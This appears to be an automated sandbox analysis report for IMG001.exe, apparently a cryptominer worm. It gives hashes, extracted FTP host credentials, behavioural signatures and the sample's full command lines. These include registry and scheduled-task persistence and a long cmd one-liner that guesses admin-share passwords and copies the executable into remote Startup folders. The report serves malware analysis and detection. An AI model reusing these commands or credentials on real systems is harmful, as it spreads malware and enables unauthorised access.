Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2023 12:42
Static task
static1
Behavioral task
behavioral1
Sample
IMG001.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
IMG001.exe
Resource
win10v2004-20230220-en
General
-
Target
IMG001.exe
-
Size
3.4MB
-
MD5
979f00d5eadab60eb68529c990e49896
-
SHA1
d01397159c414eaf5a7ab0e092c662e8b3a0eadc
-
SHA256
b21cc3afe552b093b598fc93a023897acd91ebcb8dc045f16463962dcfacf9d0
-
SHA512
1fe39bd6c786831db279c2e50a095894cf79ac82662cf8167864ec2587e857423e8441a358daa25ade88cb72ab763f0323a0f4b02c8a6864eb3fed786d6f93eb
-
SSDEEP
98304:MdVPnq1y5tQOM33ZNqCtBixHl54Oyjes1boI:KVPq1yLanrqTr43eSz
Malware Config
Extracted
Protocol: ftp- Host:
119.51.163.0 - Port:
21 - Username:
user - Password:
784512
Extracted
Protocol: ftp- Host:
49.76.187.3 - Port:
21 - Username:
admin - Password:
PC123
Extracted
Protocol: ftp- Host:
1.179.76.7 - Port:
21 - Username:
user
Extracted
Protocol: ftp- Host:
183.181.89.9 - Port:
21 - Username:
ftp - Password:
iloveyou
Extracted
Protocol: ftp- Host:
165.22.62.9 - Port:
21 - Username:
admin - Password:
VQsaBLPzLa
Signatures
-
Contacts a large (885) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation IMG001.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe -
Executes dropped EXE 3 IoCs
pid Process 3300 tftp.exe 208 IMG001.exe 2288 tftp.exe -
Loads dropped DLL 5 IoCs
pid Process 208 IMG001.exe 208 IMG001.exe 208 IMG001.exe 208 IMG001.exe 208 IMG001.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Windows\CurrentVersion\Run IMG001.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: IMG001.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\UAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 6 IoCs
resource yara_rule behavioral2/files/0x0004000000000741-146.dat nsis_installer_1 behavioral2/files/0x0004000000000741-146.dat nsis_installer_2 behavioral2/files/0x0004000000000741-149.dat nsis_installer_1 behavioral2/files/0x0004000000000741-149.dat nsis_installer_2 behavioral2/files/0x0004000000000741-150.dat nsis_installer_1 behavioral2/files/0x0004000000000741-150.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5012 schtasks.exe 3844 schtasks.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 848 net.exe -
Kills process with taskkill 2 IoCs
pid Process 1912 taskkill.exe 4172 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 4172 taskkill.exe Token: SeShutdownPrivilege 1524 powercfg.exe Token: SeCreatePagefilePrivilege 1524 powercfg.exe Token: SeShutdownPrivilege 2172 powercfg.exe Token: SeCreatePagefilePrivilege 2172 powercfg.exe Token: SeShutdownPrivilege 2812 powercfg.exe Token: SeCreatePagefilePrivilege 2812 powercfg.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 4956 wrote to memory of 4932 4956 IMG001.exe 86 PID 4956 wrote to memory of 4932 4956 IMG001.exe 86 PID 4956 wrote to memory of 4932 4956 IMG001.exe 86 PID 4932 wrote to memory of 1912 4932 cmd.exe 89 PID 4932 wrote to memory of 1912 4932 cmd.exe 89 PID 4932 wrote to memory of 1912 4932 cmd.exe 89 PID 4956 wrote to memory of 3300 4956 IMG001.exe 90 PID 4956 wrote to memory of 3300 4956 IMG001.exe 90 PID 4956 wrote to memory of 3300 4956 IMG001.exe 90 PID 4956 wrote to memory of 208 4956 IMG001.exe 91 PID 4956 wrote to memory of 208 4956 IMG001.exe 91 PID 4956 wrote to memory of 208 4956 IMG001.exe 91 PID 208 wrote to memory of 1800 208 IMG001.exe 92 PID 208 wrote to memory of 1800 208 IMG001.exe 92 PID 208 wrote to memory of 1800 208 IMG001.exe 92 PID 1800 wrote to memory of 4172 1800 cmd.exe 94 PID 1800 wrote to memory of 4172 1800 cmd.exe 94 PID 1800 wrote to memory of 4172 1800 cmd.exe 94 PID 208 wrote to memory of 2288 208 IMG001.exe 95 PID 208 wrote to memory of 2288 208 IMG001.exe 95 PID 208 wrote to memory of 2288 208 IMG001.exe 95 PID 208 wrote to memory of 844 208 IMG001.exe 96 PID 208 wrote to memory of 844 208 IMG001.exe 96 PID 208 wrote to memory of 844 208 IMG001.exe 96 PID 208 wrote to memory of 3948 208 IMG001.exe 98 PID 208 wrote to memory of 3948 208 IMG001.exe 98 PID 208 wrote to memory of 3948 208 IMG001.exe 98 PID 208 wrote to memory of 4872 208 IMG001.exe 100 PID 208 wrote to memory of 4872 208 IMG001.exe 100 PID 208 wrote to memory of 4872 208 IMG001.exe 100 PID 208 wrote to memory of 4468 208 IMG001.exe 102 PID 208 wrote to memory of 4468 208 IMG001.exe 102 PID 208 wrote to memory of 4468 208 IMG001.exe 102 PID 844 wrote to memory of 4116 844 cmd.exe 104 PID 844 wrote to memory of 4116 844 cmd.exe 104 PID 844 wrote to memory of 4116 844 cmd.exe 104 PID 4872 wrote to memory of 3844 4872 cmd.exe 105 PID 4872 wrote to memory of 3844 4872 cmd.exe 105 PID 4872 wrote to memory of 3844 4872 cmd.exe 105 PID 3948 wrote to memory of 5012 3948 cmd.exe 106 PID 3948 wrote to memory of 5012 3948 cmd.exe 106 PID 3948 wrote to memory of 5012 3948 cmd.exe 106 PID 4468 wrote to memory of 1524 4468 cmd.exe 107 PID 4468 wrote to memory of 1524 4468 cmd.exe 107 PID 4468 wrote to memory of 1524 4468 cmd.exe 107 PID 4468 wrote to memory of 2172 4468 cmd.exe 108 PID 4468 wrote to memory of 2172 4468 cmd.exe 108 PID 4468 wrote to memory of 2172 4468 cmd.exe 108 PID 4468 wrote to memory of 2812 4468 cmd.exe 109 PID 4468 wrote to memory of 2812 4468 cmd.exe 109 PID 4468 wrote to memory of 2812 4468 cmd.exe 109 PID 208 wrote to memory of 4368 208 IMG001.exe 119 PID 208 wrote to memory of 4368 208 IMG001.exe 119 PID 208 wrote to memory of 4368 208 IMG001.exe 119 PID 4368 wrote to memory of 1424 4368 cmd.exe 121 PID 4368 wrote to memory of 1424 4368 cmd.exe 121 PID 4368 wrote to memory of 1424 4368 cmd.exe 121 PID 1424 wrote to memory of 848 1424 cmd.exe 122 PID 1424 wrote to memory of 848 1424 cmd.exe 122 PID 1424 wrote to memory of 848 1424 cmd.exe 122 PID 1424 wrote to memory of 4492 1424 cmd.exe 123 PID 1424 wrote to memory of 4492 1424 cmd.exe 123 PID 1424 wrote to memory of 4492 1424 cmd.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\IMG001.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"2⤵
- Executes dropped EXE
PID:3300
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"3⤵
- Executes dropped EXE
PID:2288
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
- Adds Run key to start application
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1503& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
PID:848
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵PID:4492
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58604e0f263922501f749cfca447b041a
SHA185c712bdeaceb78e2785e1f63811b0c4a50f952d
SHA25652ec3ba075a507e62bb6e3272fb13b30a8ddc0f62c4ea194311d558b338eb5ed
SHA512496d7a1b8b55d28387dad3f1c43e164bb567259c4cac21dd632ccd450dfbf28d431330c27ea72a5a8034979c325d19ff3fd8a3f7fc12b1122f67ef595630d5b2
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
95KB
MD5bb60dae5a80f874eadcf5d26cf41c799
SHA164be822b1faa1c6c61f17b732069ebccf2af2396
SHA25683d39fa4bb1c3955846236964b03bec59e2738795f9dfa4ab7a2807c1baa298c
SHA512c1c5ce457a0adbaa63b82297808e94ecbe6448477acc9bdd024811e8615ec3af7018f54cd461f87fa5d7151680cda69cbbf890a41f5dac1b0576e2b11aa06a1d
-
Filesize
95KB
MD5bb60dae5a80f874eadcf5d26cf41c799
SHA164be822b1faa1c6c61f17b732069ebccf2af2396
SHA25683d39fa4bb1c3955846236964b03bec59e2738795f9dfa4ab7a2807c1baa298c
SHA512c1c5ce457a0adbaa63b82297808e94ecbe6448477acc9bdd024811e8615ec3af7018f54cd461f87fa5d7151680cda69cbbf890a41f5dac1b0576e2b11aa06a1d
-
Filesize
95KB
MD5bb60dae5a80f874eadcf5d26cf41c799
SHA164be822b1faa1c6c61f17b732069ebccf2af2396
SHA25683d39fa4bb1c3955846236964b03bec59e2738795f9dfa4ab7a2807c1baa298c
SHA512c1c5ce457a0adbaa63b82297808e94ecbe6448477acc9bdd024811e8615ec3af7018f54cd461f87fa5d7151680cda69cbbf890a41f5dac1b0576e2b11aa06a1d
-
Filesize
95KB
MD5bb60dae5a80f874eadcf5d26cf41c799
SHA164be822b1faa1c6c61f17b732069ebccf2af2396
SHA25683d39fa4bb1c3955846236964b03bec59e2738795f9dfa4ab7a2807c1baa298c
SHA512c1c5ce457a0adbaa63b82297808e94ecbe6448477acc9bdd024811e8615ec3af7018f54cd461f87fa5d7151680cda69cbbf890a41f5dac1b0576e2b11aa06a1d
-
Filesize
3.4MB
MD5979f00d5eadab60eb68529c990e49896
SHA1d01397159c414eaf5a7ab0e092c662e8b3a0eadc
SHA256b21cc3afe552b093b598fc93a023897acd91ebcb8dc045f16463962dcfacf9d0
SHA5121fe39bd6c786831db279c2e50a095894cf79ac82662cf8167864ec2587e857423e8441a358daa25ade88cb72ab763f0323a0f4b02c8a6864eb3fed786d6f93eb
-
Filesize
3.4MB
MD5979f00d5eadab60eb68529c990e49896
SHA1d01397159c414eaf5a7ab0e092c662e8b3a0eadc
SHA256b21cc3afe552b093b598fc93a023897acd91ebcb8dc045f16463962dcfacf9d0
SHA5121fe39bd6c786831db279c2e50a095894cf79ac82662cf8167864ec2587e857423e8441a358daa25ade88cb72ab763f0323a0f4b02c8a6864eb3fed786d6f93eb
-
Filesize
3.4MB
MD5979f00d5eadab60eb68529c990e49896
SHA1d01397159c414eaf5a7ab0e092c662e8b3a0eadc
SHA256b21cc3afe552b093b598fc93a023897acd91ebcb8dc045f16463962dcfacf9d0
SHA5121fe39bd6c786831db279c2e50a095894cf79ac82662cf8167864ec2587e857423e8441a358daa25ade88cb72ab763f0323a0f4b02c8a6864eb3fed786d6f93eb